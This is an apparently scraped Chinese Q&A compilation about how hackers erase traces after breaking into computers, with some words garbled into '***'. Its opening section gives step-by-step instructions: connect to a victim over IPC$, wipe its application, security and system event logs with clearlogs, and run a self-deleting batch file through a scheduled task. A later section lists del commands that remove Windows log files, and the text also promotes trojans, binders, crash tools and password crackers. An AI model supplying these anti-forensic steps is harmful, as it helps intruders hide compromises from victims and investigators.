清除黑客的软件_黑客清除痕迹的工具
文字日记:
- 1、黑客清理痕迹问题
- 2、请问黑客在入侵别人电脑后,如何清除自己留下的痕迹?
- 3、黑客入侵后,会清除入侵记录,请问下谁知道清除记录的命令是什么啊?
- 4、win32/Trojan.Hack.eof(黑客程序)是什么程序,有什么危害
- 5、黑客常用工具有哪些
- 6、痕迹清理
黑客清理痕迹问题
下面是我在网上搜到的,不明白怎么具体操作:
使用 *** :
Usage: clearlogs [\\computername] -app / -sec / -sys
-app = 应用程序日志
-sec = 安全日志
-sys = 系统日志
a. 可以清除远程计算机的日志
** 先用ipc连接上去: net use \\ip\ipc$ 密码/user:用户名
** 然后开始清除: ***
clearlogs \\ip -app 这个是清除远程计算机的应用程序日志
clearlogs \\ip -sec 这个是清除远程计算机的安全日志
clearlogs \\ip -sys 这个是清除远程计算机的系统日志
b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面
然后清除. *** :
clearlogs -app 这个是清除远程计算机的应用程序日志
clearlogs -sec 这个是清除远程计算机的安全日志
clearlogs -sys 这个是清除远程计算机的系统罩?
安全日志已经被清除.Success: The log has been cleared 成功.
为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.
例如建立一个 c.bat
rem ============================== 开始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 结束
在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果
之一行表示: 运行时不显示窗口
第二行表示: 清除应用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系统日志
第五行表示: 删除 clearlogs.exe 这个工具
第六行表示: 删除 c.bat 这个批处理文件
第七行表示: 退出
用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用 ***
AT 时间 c:\c.bat
请问黑客在入侵别人电脑后,如何清除自己留下的痕迹?
按ctrl+alt+delete可以看到黑客软件;用款软件“柳叶擦眼”可以清除黑客软件。
黑客入侵后,会清除入侵记录,请问下谁知道清除记录的命令是什么啊?
清除记录的命令:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\system32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
win32/Trojan.Hack.eof(黑客程序)是什么程序,有什么危害
win32/Trojan.Hack.eof中了这样的木马有可能被黑客控制或被盗帐号,这木马个人建议你用如下 *** 清理应当可以清理干净:
(1)重启后,F8 进带 *** 安全模式
(2)用360安全卫士依次进行:清除插件、清除垃圾、清除痕迹、系统修复、高级工具“开机启动项管理”一键优化、使用“木马查杀”杀木马,用360杀毒全盘杀毒。
如果还没清除用下以方案:
(3)重新启动,F8 进带 *** 安全模式
(4)用360系统急救箱试一试 ,希望能帮助你
黑客常用工具有哪些
冰河
冰河是更优秀的国产木马程序之一,同时也是被使用最多的一种木马 。说句心里话,如果这个软件做成规规矩矩的商业用远程控制软件,绝对不会逊于那个体积庞大、操作复杂的PCanywhere,但可惜的是,它最终变成了黑客常用的工具。
Wnuke
Wnuke可以利用Windows系统的漏洞, 通过TCP/IP协议向远程机器发送一段信息,导致一个OOB错误,使之崩溃。现象:电脑屏幕上出现一个蓝底白字的提示:“系统出现异常错误”,按ESC键后又回到原来的状态,或者死机。它可以攻击WIN9X、WINNT、WIN2000等系统,并且可以自由设置包的大小和个数,通过连续攻击导致对方死机。
Shed
Shed是基于NetBIOS的攻击Windows的软件。NetBIOS(Network Basic Input Output System, *** 基本输入输出系统),是一种应用程序接口(API),作用是为局域网(LAN)添加特殊功能,几乎所有的局域网电脑都是在NetBIOS基础上工作的。在我们的Windows 95、99、或Me中,NetBIOS是和TCP/IP捆绑在一起的,这是十分危险的!但当我们安装TCP/IP协议时,默认情况下NetBIOS和它的文件与打印共享功能也一起被装进了系统。当NetBIOS运行时,你的后门打开了:因为NetBIOS不光允许局域网内的用户访问你的硬盘资源,Internet上的黑客也能!Shed正是利用了这一点
溯雪
溯雪还是小榕的作品。该软件利用asp、cgi对免费信箱、论坛、聊天室进行密码探测的软件。密码探测主要是通过猜测生日的 *** 来实现,成功率可达60%-70%。溯雪的运行原理是通过提取asp、cgi页面表单,搜寻表单运行后的错误标志,有了错误标志后,再挂上字典文件来破解信箱密码。用溯雪来探测信箱密码真的是很容易,由于许多人对密码的设置采用了自己的生日或常用英文单词等较简单的方式,这给溯雪留下了很大的施展空间。我曾用自己的信箱做过试验,采用生日作为密码,溯雪只用了不到3分钟就成功的破解出了我的密码!要知道我用的字典很大,若字典再小些,会更快的!
流光
流光这是国人小榕的作品,当我首次使用这个软件时,我被它深深地震住了。这个软件能让一个刚刚会用鼠标的人成为专业级黑客,它可以探测POP3、FTP、HTTP、PROXY、FORM、SQL、 *** TP、IPC$ 上的各种漏洞,并针对各种漏洞设计了不同的破解方案,能够在有漏洞的系统上轻易得到被探测的用户密码。流光对WIN9X、WINNT、WIN2000上的漏洞都可以探测,使它成为许多黑客手中的必备工具之一,一些资深黑客也对它青睐有加。
ExeBind
ExeBind可以将指定的黑客程序捆绑到任何一个广为传播的热门软件上,使宿主程序执行时,寄生程序(黑客程序)也在后台被执行。当您再次上网时,您已经在不知不觉中被控制住了。您说这个文件捆绑专家恐怖不?而且它支持多重捆绑。实际上是通过多次分割文件,多次从父进程中调用子进程来实现的。现象:几乎无。危害:NetSpy、HDFILL、BO 2000常通过这种形式在Internet上寄生传播。如果有一天您收到一个不相识的人发来的不错的程序,请仔细检查一下,因为没准它是用ExeBind捆绑了木马程序!
Superscan
是一个功能强大的扫描器,速度奇快,探测台湾全部回应值小于200MS的IP段仅用6个小时。可以查看本机IP地址和域名,扫描一个IP段的所有在线主机以及其可探测到的端口号。而且可以保存和导入所有已探测的信息。
HackerScan
邮箱终结者类似的邮箱炸弹很多,它们的原理基本一致,最根本的目标就是涨破您的邮箱,使您无法正常收发E-mail。
痕迹清理
这个是不够的!!
我想你说的不单指IE上网的地址纪录吧,应该历史上网纪录,系统文件操作纪录等等吧
为什么我说不能的呢?因为很多纪录都会存在cookies,临时文件,注册表信息,系统日志,DNS日志,应用程序日志,WWW日志等,尤其是注册表和系统日志,360安全卫士和超级兔子都不能做到“完全清除”的!这2个软件只会对临时文件,IE纪录这些作出清理!
要做到完全的清除日志,不是菜鸟级所能做到的,即使使用日志清除工具,也只能说清除大多日志了。但是一般没有必要完全清除使用痕迹,那么除了使用360安全卫士和超级兔子外,我建议再使用日志清除工具9合1工具(所谓的黑客工具,黑客入侵后清除痕迹的帮手!),下载地址 *** 上自己去搜咯!希望我的答案对你有帮助,祝你好运吧.
